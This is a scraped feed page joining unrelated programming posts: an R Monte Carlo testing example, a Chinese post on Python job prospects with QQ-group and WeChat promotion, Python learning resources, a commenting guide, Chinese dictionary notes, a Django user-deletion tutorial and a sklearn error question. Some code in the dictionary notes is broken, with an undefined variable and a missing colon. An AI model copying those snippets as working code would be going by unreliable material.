res <- lm(Sepal.Width ~ Sepal.Length, data = setosa) summary(res) ## ## Call: ## lm(formula = Sepal.Width ~ Sepal.Length, data = setosa) ## ## Residuals: ## Min 1Q Median 3Q Max ## -0.72394 -0.18273 -0.00306 0.15738 0.51709 ## ## Coefficients: ## Estimate Std. Error t value Pr(>|t|) ## (Intercept) -0.5694 0.5217 -1.091 0.281 ## Sepal.Length 0.7985 0.1040 7.681 6.71e-10 *** ## --- ## Signif. codes: 0 '***' 0.001 '**' 0.01 '*' 0.05 '.' 0.1 ' ' 1 ## ## Residual standard error: 0.2565 on 48 degrees of freedom ## Multiple R-squared: 0.5514, Adjusted R-squared: 0.542 ## F-statistic: 58.99 on 1 and 48 DF, p-value: 6.71e-10

Let’s now implement the procedure I described with MCHTest() .

ts <- function(x) { res <- lm(Sepal.Width ~ Sepal.Length, data = x) summary(res)$fstatistic[[1]] # Only way I know to automatically compute the # statistic } # rand_gen's function can use both x and n, and n will be the number of rows of # the dataset rg <- function(x, n) { x$Sepal.Width <- sample(x$Sepal.Width, replace = TRUE, size = n) x } b.f.test.1 <- MCHTest(ts, ts, rg, seed = 123, N = 1000) b.f.test.1(setosa) ## ## Monte Carlo Test ## ## data: setosa ## S = 58.994, p-value < 2.2e-16

Excellent! It reached the correct conclusion.

Conclusion

One may naturally ask whether we can write functions a bit more general than what I’ve shown here at least in the regression context. For example, one may want parameters specifying a formula so that the regression model isn’t hard-coded into the test. In short, the answer is yes; MCHTest objects try to pass as many parameters to the input functions as they can.

Here is the revised example that works for basically any formula:

ts <- function(x, formula) { res <- lm(formula = formula, data = x) summary(res)$fstatistic[[1]] } rg <- function(x, n, formula) { dep_var <- all.vars(formula)[1] # Get the name of the dependent variable x[[dep_var]] <- sample(x[[dep_var]], replace = TRUE, size = n) x } b.f.test.2 <- MCHTest(ts, ts, rg, seed = 123, N = 1000) b.f.test.2(setosa, formula = Sepal.Width ~ Sepal.Length) ## ## Monte Carlo Test ## ## data: setosa ## S = 58.994, p-value < 2.2e-16

This shows that you can have a lot of control over how MCHTest objects handle their inputs, giving you considerable flexibility.

Next post: time series and MCHT

References R. A. Fisher, The design of experiments (1935)

Packt Publishing published a book for me entitled Hands-On Data Analysis with NumPy and Pandas , a book based on my video course Unpacking NumPy and Pandas . This book covers the basics of setting up a python environment for data analysis with Anaconda, using Jupyter notebooks, and using NumPy and pandas. If you are starting out using Python for data analysis or know someone who is, please consider buying my book or at least spreading the word about it. You can buy the book directly or purchase a subscription to Mapt and read it there.

If you like my blog and would like to support it, spread the word (if not get a copy yourself)!

Related

To leave a comment for the author, please follow the link and comment on their blog: R Curtis Miller's Personal Website .

R-bloggers.com offers daily e-mail updates about R news andtutorials on topics such as:Data science, Big Data, R jobs , visualization (ggplot2, Boxplots , maps ,animation), programming (RStudio, Sweave , LaTeX , SQL , Eclipse , git , hadoop ,Web Scraping) statistics (regression, PCA , time series , trading

) and more...

If you got this far, why not subscribe for updates from the site? Choose your flavor: e-mail , twitter , RSS , or facebook ...


          自学Python找不到工作?一天只学一小时,大佬劝你还是放弃吧!      Cache   Translate Page      

python发展可以说是如日中天,更多的人选择学习Python,也更多的人开始关注它,从这些关注度来看,我发现关注度最高的还是Python的就业前景是怎么样的,毕竟大家学习Python都是为了以后能有好的工作,那么,Python就业到底靠不靠谱呢?答案当然是肯定的。

都说,滴水穿石非一日之功。然而有些人即使奋斗一辈子也比不上别人一年,别人学习一年比不得你学习一个月。其中缘由,有些人看了大半辈子还没看明白。


自学Python找不到工作?一天只学一小时,大佬劝你还是放弃吧!

即使Python这么火,为何你学习一年的Python还找不到工作?

我认为有以下四点非常关键:

1,功利心强:

急需赚钱之人,所以才会着重强调“赚钱”这个字眼。如果越是功力心强,进取心弱,越着急学,越学不明白。


自学Python找不到工作?一天只学一小时,大佬劝你还是放弃吧!

2,基础薄弱:

Python编程零基础的人,或者是基础十分薄弱之人,所在的工作岗位应该也涉及不到计算机编程,那么也许你也许还是一个初学者,一点方向都没有,只知道python这个名词,一些基本语法,别的一无所知,这种情况,学起来更难了。学习资料也可以加下Python扣扣裙:304零五零799自己下载学习下。


自学Python找不到工作?一天只学一小时,大佬劝你还是放弃吧!

3,兴趣全无:

对编程没兴趣,要是有兴趣,起码你学习了一年python,不至于连份体面的工作都找不到,这种一看就是平时连互联网技术、发展,都不关注的人问出的问题了。


自学Python找不到工作?一天只学一小时,大佬劝你还是放弃吧!

带有功利性去学python编程,再简单的东西也会变得很难。如果你不能抛弃功利心,而且内心对python编程没兴趣,那还是别入这行了。


自学Python找不到工作?一天只学一小时,大佬劝你还是放弃吧!

4,学过其它语言,所以从内心瞧不起Python:

十年前,Pascal。我会精确计算每个数组和变量使用的内存,熟练地用非递归方法改写程序,最短的时间内自己实现各种排序,多源最短路径,求凸包和相邻点,动态规划,二分图匹配和网络流算法......,同时考虑算法的最坏复杂度和最高项前边的那个常数。现在,我一个都不记得了是的现在列举这些名词我就是在装逼。

1:

事实: 企业招聘到合格的程序员很难。凡是找不到工作的,编程能力没有达到企业用人的最低标准。

笔者2017年4月到上海参加Gopher China 2017年大会,看到的是企业设展台招聘程序员,演讲者演讲完,也招聘程序员,有的参会者也去招聘程序员。这是Golang的情况。

1、Python 的职位更多,比Java、php 稍微少点,但同等水平程序员,Python 的工资比PHP的高一些。

2、在北上广深、成都、武汉、杭州等地Python 职位挺多,但在其它地方稍微少一些。

上面说了工作不是问题,下面说说怎么才能满足企业的需要。

3、打铁还得自身硬。只有通过企业的面试才有机会当程序员。很多人听说程序员工资高,但叶公好龙,碰到困难就退缩,这个不是学习编程的正确态度。

4、正确的学习方法,能自学就自学,自学搞不定的,找人指导或者参加培训。

5、见过号称会编程的Python程序员,有的可能自我感觉良好,一去面试就挂。

6.想了解更多编程方面的分享请关注威信公众号:程序员大牛,每天分享干货!


          The 5 Best Websites to Learn Python Programming      Cache   Translate Page      

Over the past decade, the python programming language has exploded in popularity for all types of coding. From web developers to video game designers, from data scientists to in-house tool creators, many have fallen in love with Python. Why? Because Python is easy to learn, easy to use, and very powerful.

Want to learn Python programming? Here are some of the best resources and ways to learn Python online, many of which are entirely free. For optimal results, we recommend that you utilize ALL of these websites, as they each have their own pros and cons.

1. How to Think Like a Computer Scientist
The 5 Best Websites to Learn Python Programming

One of the best Python tutorials on the web, the How to Think Like a Computer Scientist interactive web tutorial is great because it not only teaches you how to use the Python programming language, but also how to think like a programmer. If this is the first time you’ve ever touched code, then this site will be an invaluable resource for you.

Keep in mind, however, that learning how to think like a computer scientist will require a complete shift in your mental paradigm. Grasping this shift may be easy for some and difficult for others, but as long as you persevere, it will eventually click. And once you’ve learned how to think like a computer scientist, you’ll be able to learn programming languages other than Python with ease!

2. The Official Python Tutorial
The 5 Best Websites to Learn Python Programming

What better place to learn Python than on the official Python website? The creators of the language itself have devised a large and helpful guide that walks you through the language basics.

The best part of this web tutorial is that it moves slowly, drilling specific concepts into your head from multiple angles to make sure you truly understand them before moving on. The website’s formatting is simple and pleasing to the eye, which just makes the whole experience that much easier.

If you have some background in programming, the official Python tutorial may be too slow and boring for you―but if you’re a brand newbie, you’ll likely find it to be an indispensable resource on your journey.

3. A Byte of Python
The 5 Best Websites to Learn Python Programming

The A Byte of Python web tutorial series is awesome for those who want to learn Python and have a bit of previous experience with programming. The very first part of the tutorial walks you through the steps necessary to set up a Python interpreter on your computer, which can be a troublesome process for first timers.

There is one drawback to this website: it does try to dive in a bit too quickly. As someone with Python experience under my belt, I can see how newbies might be intimidated by how quickly the author moves through the language.

But if you can keep up, then A Byte of Python is a fantastic resource. If you can’t?Try some of the other Python tutorial websites in this list first, and once you have a better grasp of the language, come back and try this one again.

4. LearnPython
The 5 Best Websites to Learn Python Programming

Unlike the previously listed Python tutorial sites, LearnPython is great because the website itself has a built-in Python interpreter. This means you can play around with Python coding right on the website, eliminating the need for you to muck around and install a Python interpreter on your system first.

Of course, you’ll need to install an interpreter eventually if you plan on getting serious with the language, but LearnPython actually lets you try Python before investing too much time setting up a language that you might end up not using.

LearnPython’s tutorial incorporates the interpreter, which allows you to play around with code in real-time, making changes and experimenting as you learn. The programming exercises at the end of each lesson are helpful, too.

5. Learn X in Y Minutes: Python 3
The 5 Best Websites to Learn Python Programming

Let’s say you have plenty of programming experience and you already know how to think like a programmer, but Python is new to you and you just want to get to grips with the actual syntax of the language. In that case,Learn X in Y Minutes is the best website for you.

True to its name, this site lays out all of the syntactic nuances of Python in code format so that you can learn all of the important bits of Python’s syntax in under 15 minutes. It’s succinct enough to suffice as a reference―bookmark the page and come back to it whenever you forget a certain aspect of Python.

In fact, Learn X in Y Minutes is my favorite resource for learning any programming language’s syntax.

Bonus Resource: CodeWars
The 5 Best Websites to Learn Python Programming

CodeWars isn’t so much a tutorial as it is a gamified way to test your programming knowledge . It consists of hundreds of different coding puzzles (called “katas”), which force you to take what you’ve learned from the aforementioned Python websites and apply them to real-life problems.

The katas on CodeWars are categorized by difficulty, and they do have an instructive quality to them, so you’ll definitely learn as you go through each puzzle. As you complete katas, you’ll “level up” and gain access to harder katas. But the best part? You can compare your solutions with solutions submitted by others, which will significantly accelerate your learning.

Though it has a relatively shallow learning curve, Python is a powerful language that can be utilized in multiple applications. Its popularity has grown consistently over the years, and there’s no indication that the language will disappear any time soon.

Still have questions? Check out our answers to the most frequently asked questions about Python programming The Most Frequently Asked Questions About Python Programming The Most Frequently Asked Questions About Python Programming In this article, we'll walk you through everything you need to know about Python as a beginner. Read More .


          Writing Comments in Python (Guide)      Cache   Translate Page      

When writing code in python, it’s important to make sure that your code can be easily understood by others . Giving variables obvious names, defining explicit functions, and organizing your code are all great ways to do this.

Another awesome and easy way to increase the readability of your code is by using comments !

In this tutorial, you’ll cover some of the basics of writing comments in Python. You’ll learn how to write comments that are clean and concise, and when you might not need to write any comments at all.

You’ll also learn: Why it’s so important to comment your code Best practices for writing comments in Python Types of comments you might want to avoid How to practice writing cleaner comments

Free Bonus:5 Thoughts On Python Mastery, a free course for Python developers that shows you the roadmap and the mindset you'll need to take your Python skills to the next level.

Why Commenting Your Code Is So Important

Comments are an integral part of any program. They can come in the form of module-level docstrings, or even inline explanations that help shed light on a complex function.

Before diving into the different types of comments, let’s take a closer look at why commenting your code is so important.

Consider the following two scenarios in which a programmer decided not to comment their code.

When Reading Your Own Code

Client A wants a last-minute deployment for their web service. You’re already on a tight deadline, so you decide to just make it work. All that “extra” stuff―documentation, proper commenting, and so forth―you’ll add that later.

The deadline comes, and you deploy the service, right on time. Whew!

You make a mental note to go back and update the comments, but before you can put it on your to-do list, your boss comes over with a new project that you need to get started on immediately. Within a few days, you’ve completely forgotten that you were supposed to go back and properly comment the code you wrote for Client A.

Fast forward six months, and Client A needs a patch built for that same service to comply with some new requirements. It’s your job to maintain it, since you were the one who built it in the first place. You open up your text editor and…

What did you even write?!

You spend hours parsing through your old code, but you’re completely lost in the mess. You were in such a rush at the time that you didn’t name your variables properly or even set your functions up in the proper control flow. Worst of all, you don’t have any comments in the script to tell you what’s what!

Developers forget what their own code does all the time, especially if it was written a long time ago or under a lot of pressure. When a deadline is fast approaching, and hours in front of the computer have led to bloodshot eyes and cramped hands, that pressure can be reflected in the form of code that is messier than usual.

Once the project is submitted, many developers are simply too tired to go back and comment their code. When it’s time to revisit it later down the line, they can spend hours trying to parse through what they wrote.

Writing comments as you go is a great way to prevent the above scenario from happening. Be nice to Future You!

When Others Are Reading Your Code

Imagine you’re the only developer working on a small Django project . You understand your own code pretty well, so you don’t tend to use comments or any other sort of documentation, and you like it that way. Comments take time to write and maintain, and you just don’t see the point.

The only problem is, by the end of the year your “small Django project” has turned into a “20,000 lines of code” project, and your supervisor is bringing on additional developers to help maintain it.

The new devs work hard to quickly get up to speed, but within the first few days of working together, you’ve realized that they’re having some trouble. You used some quirky variable names and wrote with super terse syntax. The new hires spend a lot of time stepping through your code line by line, trying to figure out how it all works. It takes a few days before they can even help you maintain it!

Using comments throughout your code can help other developers in situations like this one. Comments help other devs skim through your code and gain an understanding of how it all works very quickly. You can help ensure a smooth transition by choosing to comment your code from the outset of a project.

How to Write Comments in Python

Now that you understand why it’s so important to comment your code, let’s go over some basics so you know how to do it properly.

Python Commenting Basics

Comments are for developers. They describe parts of the code where necessary to facilitate the understanding of programmers, including yourself.

To write a comment in Python, simply put the hash mark # before your desired comment:

# This is a comment

Python ignores everything after the hash mark and up to the end of the line. You can insert them anywhere in your code, even inline with other code:

print("This will run.") # This won't run

When you run the above code, you will only see the output This will run. Everything else is ignored.

Comments should be short, sweet, and to the point. While PEP 8 advises keeping code at 79 characters or fewer per line, it suggests a max of 72 characters for inline comments and docstrings. If your comment is approaching or exceeding that length, then you’ll want to spread it out over multiple lines.

Python Multiline Comments

Unfortunately, Python doesn’t have a way to write multiline comments as you can in languages such as C, Java, and Go:

# So you can't just do this in python

In the above example, the first line will be ignored by the program, but the other lines will raise a Syntax Error.

In contrast, a language like Java will allow you to spread a comment out over multiple lines quite easily:

/* You can easily write multiline comments in Java */

Everything between /* and */ is ignored by the program.

While Python doesn’t have native multiline commenting functionality, you can create multiline comments in Python. There are two simple ways to do so.

The first way is simply by pressing the return key after each line, adding a new hash mark and continuing your comment from there:

def multiline_example(): # This is a pretty good example # of how you can spread comments # over multiple lines in Python

Each line that starts with a hash mark will be ignored by the program.

Another thing you can do is use multiline strings by wrapping your comment inside a set of triple quotes:

""" If I really hate pressing `enter` and typing all those hash marks, I could just do this instead """

This is like multiline comments in Java, where everything enclosed in the triple quotes will function as a comment.

While this gives you the multiline functionality, this isn’t technically a comment. It’s a string that’s not assigned to any variable, so it’s not called or referenced by your program. Still, since it’ll be ignored at runtime and won’t appear in the bytecode, it can effectively act as a comment. (You can take a look at this article for proof that these strings won’t show up in the bytecode.)

However, be careful where you place these multiline “comments.” Depending on where they sit in your program, they could turn into docstrings , which are pieces of documentation that are associated with a function or method. If you slip one of these bad boys right after a function definition, then what you intended to be a comment will become associated with that object.

Be careful where you use these, and when in doubt, just put a hash mark on each subsequent line. If you’re interested in learning more about docstrings and how to associate them with modules, classes, and the like, check out our tutorial on Documenting Python Code .

Python Commenting Shortcuts

It can be tedious to type out all those hash marks every time you need to add a comment. So what can you do to speed things up a bit? Here are a few tricks to help you out when commenting.

One of the first things you can do is use multiple cursors. That’s exactly what it sounds like: placing more than one cursor on your screen to accomplish a task. Simply hold down the Ctrl or Cmd key while you left-click, and you should see the blinking lines on your screen:


Writing Comments in Python (Guide)

This is most effective when you need to comment the same thing in several places.

What if you’ve got a long stretch of text that needs to be commented out? Say you don’t want a defined function to run in order to check for a bug. Clicking each and every line to comment it out could take a lot of time! In these cases, you’ll want to toggle comments instead. Simply select the desired code and press Ctrl + / on PC, or Cmd + / on Mac:


Writing Comments in Python (Guide)

All the highlighted text will be prepended with a hash mark and ignored by the program.

If your comments are getting too unwieldy, or the comments in a script you’re reading are really long, then your text editor may give you the option to collapse them using the small down arrow on the left-hand side:


Writing Comments in Python (Guide)

Simply click the arrow to hide the comments. This works best with long comments spread out over multiple lines, or docstrings that take up most of the start of a program.

Combining these tips will make commenting your code quick, easy, and painless!

Python Commenting Best Practices

While it’s good to know how to write comments in Python, it’s just as vital to make sure that your comments are readable and easy to understand.

Take a look at these tips to help you write comments that really support your code.

When Writing Code for Yourself

You can make life easier for yourself by commenting your own code properly. Even if no one else will ever see it, you’ll see it, and that’s enough reason to make it right. You’re a developer after all, so your code should be easy for you to understand as well.

One extremely useful way to use comments for yourself is as an outline for your code. If you’re not sure how your program is going to turn out, then you can use comments as a way to keep track of what’s left to do, or even as a way of tracking the high-level flow of your program. For instance, use comments to outline a function in pseudo-code:

from collections import defaultdict def get_top_cities(prices): top_cities = defaultdict(int) # For each price range # Get city searches in that price # Count num times city was searched # Take top 3 cities & add to dict return dict(top_cities)

These comments plan out get_top_cities() . Once you know exactly what you want your function to do, you can work on translating that to code.

Using comments like this can help keep everything straight in your head. As you walk through your program, you’ll know what’s left to do in order to have a fully functional script. After “translating” the comments to code, remember to remove any comments that have become redundant so that your code stays crisp and clean.

You can also use comments as part of the debugging process. Comment out the old code and see how that affects your output. If you agree with the change, then don’t leave the code commented out in your program, as it decreases readability. Delete it and use version control if you need to bring it back.

Finally, use comments to define tricky parts of your own code. If you put a project down and come back to it months or years later, you’ll spend a lot of time trying to get reacquainted with what you wrote. In case you forget what your own code does, do Future You a favor and mark it down so that it will be easier to get back up to speed later on.

When Writing Code for Others

People like to skim and jump back and forth through text, and reading code is no different. The only time you’ll probably read through code line by line is when it isn’t working and you have to figure out what’s going on.

In most other cases, you’ll take a quick glance at variables and function definitions in order to get the gist. Having comments to explain what’s happening in plain English can really assist a developer in this position.

Be nice to your fellow devs and use comments to help them skim through your code. Inline comments should be used sparingly to clear up bits of code that aren’t obvious on their own. (Of course, your first priority should be to make your code stand on its own, but inline comments can be useful in this regard.)

If you have a complicated method or function whose name isn’t easily understandable, you may want to include a short comment after the def line to shed some light:

def complicated_function(s): # This function does something complicated

This can help other devs who are skimming your code get a feel for what the function does.

For any public functions, you’ll want to include an associated docstring, whether it’s complicated or not:

def sparsity_ratio(x: np.array) -> float: """Return a float Percentage of values in array that are zero or NaN """

This string will become the .__doc__ attribute of your function and will officially be associated with that specific method. The PEP 257 docstring guidelines will help you to structure your docstring. These are a set of conventions that developers generally use when structuring docstrings.

The PEP 257 guidelines have conventions for multiline docstrings as well. These docstrings appear right at the top of a file and include a high-level overview of the entire script and what it’s supposed to do:

# -*- coding: utf-8 -*- """A module-level docstring Notice the comment above the docstring specifying the encoding. Docstrings do appear in the bytecode, so you can access this through the ``__doc__`` attribute. This is also what you'll see if you call help() on a module or any other Python object. """

A module-level docstring like this one will contain any pertinent or need-to-know information for the developer reading it. When writing one, it’s recommended to list out all classes, exceptions, and functions as well as a one-line summary for each.

Python Commenting Worst Practices

Just as there are standards for writing Python comments, there are a few types of comments that don’t lead to Pythonic code. Here are just a few.

Avoid: W.E.T. Comments

Your comments should be D.R.Y. The acronym stands for the programming maxim “Don’t Repeat Yourself.” This means that your code should have little to no redundancy. You don’t need to comment a piece of code that sufficiently explains itself, like this one:

return a # Returns a

We can clearly see that a is returned, so there’s no need to explicitly state this in a comment. This makes comments W.E.T., meaning you “wrote everything twice.” (Or, for the more cynical out there, “wasted everyone’s time.”)

W.E.T. comments can be a simple mistake, especially if you used comments to plan out your code before writing it. But once you’ve got the code running well, be sure to go back and remove comments that have become unnecessary.

Avoid: Smelly Comments

Comments can be a sign of “code smell,” which is anything that indicates there might be a deeper problem with your code. Code smells try to mask the underlying issues of a program, and comments are one way to try and hide those problems. Comments should support your code, not try to explain it away. If your code is poorly written, no amount of commenting is going to fix it.

Let’s take this simple example:

# A dictionary of families who live in each city mydict = { "Midtown": ["Powell", "Brantley", "Young"], "Norcross": ["Montgomery"], "Ackworth": [] } def a(dict): # For each city for p in dict: # If there are no families in the city if not mydict: # Say that there are no families print("None.")

This code is quite unruly. There’s a comment before every line explaining what the code does. This script could have been made simpler by assigning obvious names to variables, functions, and collections, like so:

families_by_city = { "Midtown": ["Powell", "Brantley", "Young"], "Norcross": ["Montgomery"], "Ackworth": [], } def no_families(cities): for city in cities: if not cities[city]: print(f"No families in {city}.")

By using obvious naming conventions, we were able to remove all unnecessary comments and reduce the length of the code as well!

Your comments should rarely be longer than the code they support. If you’re spending too much time explaining what you did, then you need to go back and refactor to make your code more clear and concise.

Avoid: Rude Comments

This is something that’s likely to come up when working on a development team. When several people are all working on the same code, others are going to be going in and reviewing what you’ve written and making changes. From time to time, you might come across someone who dared to write a comment like this one:

# Put this here to fix Ryan's stupid-a** mistake

Honestly, it’s just a good idea to not do this. It’s not okay if it’s your friend’s code, and you’re sure they won’t be offended by it. You never know what might get shipped to production, and how is it going to look if you’d accidentally left that comment in there, and a client discovered it down the road? You’re a professional, and including vulgar words in your comments is not the way to show that.

How to Practice Commenting

The simplest way to start writing more Pythonic comments is just to do it!

Start writing comments for yourself in your own code. Make it a point to include simple comments from now on where necessary. Add some clarity to complex functions, and put a docstring at the top of all your scripts.

Another good way to practice is to go back and review old code that you’ve written. See where anything might not make sense, and clean up the code. If it still needs some extra support, add a quick comment to help clarify the code’s purpose.

This is an especially good idea if your code is up on GitHub and people are forking your repo. Help them get started by guiding them through what you’ve already done.

You can also give back to the community by commenting other people’s code. If you’ve downloaded something from GitHub and had trouble sifting through it, add comments as you come to understand what each piece of code does.

“Sign” your comment with your initials and the date, and then submit your changes as a pull request. If your changes are merged, you could be helping dozens if not hundreds of developers like yourself get a leg up on their next project.

Conclusion

Learning to comment well is a valuable tool. Not only will you learn how to write more clearly and concisely in general, but you’ll no doubt gain a deeper understanding of Python as well.

Knowing how to write comments in Python can make life easier for all developers, including yourself! They can help other devs get up to speed on what your code does, and help you get re-acquainted with old code of your own.

By noticing when you’re using comments to try and support poorly written code, you’ll be able to go back and modify your code to be more robust. Commenting previously written code, whether your own or another developer’s, is a great way to practice writing clean comments in Python.

As you learn more about documenting your code, you can consider moving on to the next level of documentation. Check out our tutorial on Documenting Python Code to take the next step.


          python编程:从入门到实践学习笔记-字典      Cache   Translate Page      

字典类似于通过联系人名字查找联系人电话号码的电话本,即把键(名字)和值(电话号码)联系在一起。注意,键必须是 唯一 的。并且python只能使用 不可变 的对象(比如字符串)来作为字典的键,但是可以将不可变或可变的对象作为字典的值。举一个简单的字典例子。

alien = {'color': 'green', 'points': 5}复制代码

键值对在字典中的标记为: d = {key1 : value1, key2 : value2 } 。注意键/值对用冒号分割,而各个对用逗号分割,所有这些都包括在花括号中。字典中的键/值对是没有顺序的。如果想要一个指定的顺序,那么在使用前自行排序。

使用字典

访问字典中的值

依次指定字典名和放在方括号内的键,如下所示:

alien = {'color': 'green', 'points': 5} print(alien_0['color']) #运行结果: green复制代码

创建字典并修改字典中的值

创建空字典时使用一对空的花括号定义一个字典,再分行添加各个键值对。

修改字典的值可以指定字典名、键以及新的赋值。

alien = {} alien['x_position'] = 0 alien['y_position'] = 25 print(alien) alien['x_position'] = 25 print(alien) #运行结果: {'x_position': 0, 'y_position': 25} {'x_position': 25, 'y_position': 25}复制代码

添加/删除键值对

字典是一种动态结构。

添加键值对时,依次指定字典名、方括号和键、所赋的值。

删除键值对时,可使用 del 语句,指定字典名和要删除的键。

alien = {'color': 'green', 'points': 5} print(alien) alien['x_position'] = 0 alien['y_position'] = 25 print(alien) del alien['color'] print(alien) #运行结果: {'color': 'green', 'points': 5} {'color': 'green', 'points': 5, 'y_position': 25, 'x_position': 0} {'points': 5, 'y_position': 25, 'x_position': 0}复制代码 遍历字典

遍历所有的键值对

user = { 'username': 'efermi',#前面有四个空格的缩进,下同 'first': 'enrico', 'last': 'fermi', } for key, value in user.items() print("\nKey: " + key) print("Value: " + value) #运行结果: Key: last Value: fermi Key: first Value: enrico Key: username Value: efermi复制代码

由上可知,在字典的遍历中,可以声明两个变量分别存储键值对中的键和值。字典的方法 item() 返回一个键值对列表。注意,在遍历字典的时候,键值对的返回顺序与存储顺序不同。python只关系键和值之间的对应关系。

遍历字典中的所有键/值

使用方法 keys() 可以遍历字典中的所有键。或者不使用方法,默认遍历字典中的键。

使用方法 values() 可以遍历字典中的所有值。返回一个值列表。

favorite_languages = { 'jen': 'python', 'sarah': 'c', 'edward': 'ruby', 'phil': 'python', } for name in favorite_languages.keys(): print(name.title()) for language in favorite_languages.values(): print(language.title()) #运行结果: Jen Sarah Edward Phil Python C Ruby Python复制代码

或者不使用方法,默认遍历字典中的键。即 for name in favorite_languages.keys(): 效果等同 for name in favorite_languages: 。

若需按顺序遍历,只需使用 sorted() 。

嵌套

将一系列字典存储在列表中,或者将列表作为值存储在字典中,称为嵌套。

字典列表

将一系列字典存储在列表中。

alien_0 = {'color': 'green', 'points': 5} alien_1 = {'color': 'yellow', 'points': 10} alien_2 = {'color': 'red', 'points': 15} aliens = [alien_0, alien_1, alien_2] for alien in aliens: print(alien) #运行结果: {'color': 'green', 'points': 5} {'color': 'yellow', 'points': 10} {'color': 'red', 'points': 15}复制代码

列表字典

将字典存储在列表中。

lili = { 'name': 'lili', 'phonenum': ['123', '456'], } print("lili's name is " + lili['name'] + " and her phonenum is ") for num in lili['phonenum']: print("\t" + num) #运行结果: lili's name is lili and her phonenum is 123 456复制代码

字典中嵌套字典

存储网站用户信息可以在字典中嵌套字典,例如:

users = { 'aeinstein': { 'first': 'albert', 'last': 'einstein', 'location': 'princeton', }, 'mcurie': { 'first': 'marie', 'last': 'curie', 'location': 'paris', }, } for username, user_info in users.items(): print("\nUsername: " + username) full_name = user_info['first'] + " " + user_info['last'] location = user_info['location'] print("\tFull name: " + full_name.title()) print("\tLocation: " + location.title()) #运行结果: Username: aeinstein Full name: Albert Einstein Location: Princeton Username: mcurie Full name: Marie Curie Location: Paris复制代码
          Django搭建个人博客:用户的删除      Cache   Translate Page      

删除用户数据本身的逻辑并不复杂,但是会涉及到新的问题。

用户数据是很多网站最重要的财产, 确保用户数据的安全是非常重要的 。

前面学习的用户登录、退出、创建都是相对安全的操作;而删除数据就很危险,弄不好会造成不可逆的损失。因此我们希望对操作者做一些限制,比如只能用户登录且必须是本用户才能进行删除的操作。这就是 权限 。

因此在视图中进行简单的用户权限的验证工作。编写 /userprofile/views.py :

/userprofile/views.py from django.contrib.auth.models import User # 引入验证登录的装饰器 from django.contrib.auth.decorators import login_required ... @login_required(login_url='/userprofile/login/') def user_delete(request, id): user = User.objects.get(id=id) # 验证登录用户、待删除用户是否相同 if request.user == user: #退出登录,删除数据并返回博客列表 logout(request) user.delete() return redirect("article:article_list") else: return HttpResponse("你没有删除操作的权限。") 复制代码

分析上面的代码:

@login_required 是一个 python装饰器 。装饰器可以在不改变某个函数内容的前提下,给这个函数添加一些功能。具体来说就是 @login_required 要求调用 user_delete() 函数时,用户必须登录;如果未登录则不执行函数,将页面重定向到 /userprofile/login/ 地址去。

装饰器的详细解释可以看这里: 如何理解Python装饰器? @login_required 的详细解释看这里:login_required

装饰器确认用户已经登录后,允许调用 user_delete() ;然后需要删除的用户 id 通过请求传递到视图中,由 if 语句确认是否与登录的用户一致,成功后则退出登录并删除用户数据,返回博客列表页面。

模板与url

然后改写 /templates/header.html ,新增了 删除用户 的入口,并且在末尾添加 弹窗组件 的代码:

/templates/header.html ... <div class="dropdown-menu" aria-labelledby="navbarDropdown"> <!-- 新增 --> <a class="dropdown-item" href="#" onclick="user_delete()">删除用户</a> <a class="dropdown-item" href='{% url "userprofile:logout" %}'>退出登录</a> </div> ... <!-- 新增 --> {% if user.is_authenticated %} <script> function user_delete() { // 调用layer弹窗组件 layer.open({ title: "确认删除", content: "确认删除用户资料吗?", yes: function(index, layero) { location.href='{% url "userprofile:delete" user.id %}' }, }) } </script> {% endif %} 复制代码 因为删除用户要求用户必须登录,因此就把它的入口放在登陆后才显示的下拉框中,这样页面可以更加简洁。当然这种方式并不是最佳的选择,通常的做法是把删除功能放在独立的用户资料页面中。 与删除文章类似,点击 删除用户 链接后调用了 user_delete() 函数,函数包含了 弹窗组件 确认用户没有误操作;点击弹窗中的确认按钮后,调用删除的视图,执行业务逻辑。 注意到 user_delete() 函数是用 if 模板语句包裹起来的。因为用户未登录时页面对象中是没有 user.id 属性的,但是函数中却又包含了 user.id ,Django在解析模板时就会报错。 if 语句确保了 只有在用户登录时才对这段javascript代码进行解析 ,回避了这个问题。 我们在 base.html 已经引用了 弹窗组件模块 ,而 header.html 是拼接在 base.html 中的,因此就不用再重复引用弹窗组件了。

最后就是写好 /userprofile/urls.py 的路由映射了:

/userprofile/urls.py urlpatterns = [ ... # 用户删除 path('delete/<int:id>/', views.user_delete, name='delete'), ] 复制代码

运行服务器看看效果。登录用户并在右上角下拉框中点击 删除用户 :


Django搭建个人博客:用户的删除

点击确定后就可以成功删除用户数据了。

检查数据库

前面我们已经讲过如何用SQLiteStudio查看数据库存储的内容,确保数据真正的从数据库中擦除了。

用 SQLiteStudio 打开项目中 db.sqlite3 文件,找到 auth_user 字段,显示如下:


Django搭建个人博客:用户的删除

可以看到 dusai123 这个用户确实已经没有了。

在验证操作数据的逻辑时, SQLiteStudio 可以帮助我们直观的发现问题,一定要善加利用。


          Problem sklearn&colon; Found tables with inconsistent numbers of samples d ...      Cache   Translate Page      

this question seems to have been asked before, but I can't seem to comment for further clarification on the accepted answer and I couldn't figure out the solution provided.

I am trying to learn how to use sklearn with my own data. I essentially just got the annual % change in GDP for 2 different countries over the past 100 years. I am just trying to learn using a single variable for now. What I am essentially trying to do is use sklearn to predict what the GDP % change for country A will be given the percentage change in country B's GDP.

The problem is that I receive an error saying:

ValueError: Found arrays with inconsistent numbers of samples: [ 1 107]

Here is my code:

import sklearn.linear_model as lm import numpy as np import scipy.stats as st import matplotlib.pyplot as plt import matplotlib.dates as mdates def bytespdate2num(fmt, encoding='utf-8'):#function to convert bytes to string for the dates. strconverter = mdates.strpdate2num(fmt) def bytesconverter(b): s = b.decode(encoding) return strconverter(s) return bytesconverter dataCSV = open('combined_data.csv') comb_data = [] for line in dataCSV: comb_data.append(line) date, chngdpchange, ausgdpchange = np.loadtxt(comb_data, delimiter=',', unpack=True, converters={0: bytespdate2num('%d/%m/%Y')}) chntrain = chngdpchange[:-1] chntest = chngdpchange[-1:] austrain = ausgdpchange[:-1] austest = ausgdpchange[-1:] regr = lm.LinearRegression() regr.fit(chntrain, austrain) print('Coefficients: \n', regr.coef_) print("Residual sum of squares: %.2f" % np.mean((regr.predict(chntest) - austest) ** 2)) print('Variance score: %.2f' % regr.score(chntest, austest)) plt.scatter(chntest, austest, color='black') plt.plot(chntest, regr.predict(chntest), color='blue') plt.xticks(()) plt.yticks(()) plt.show()

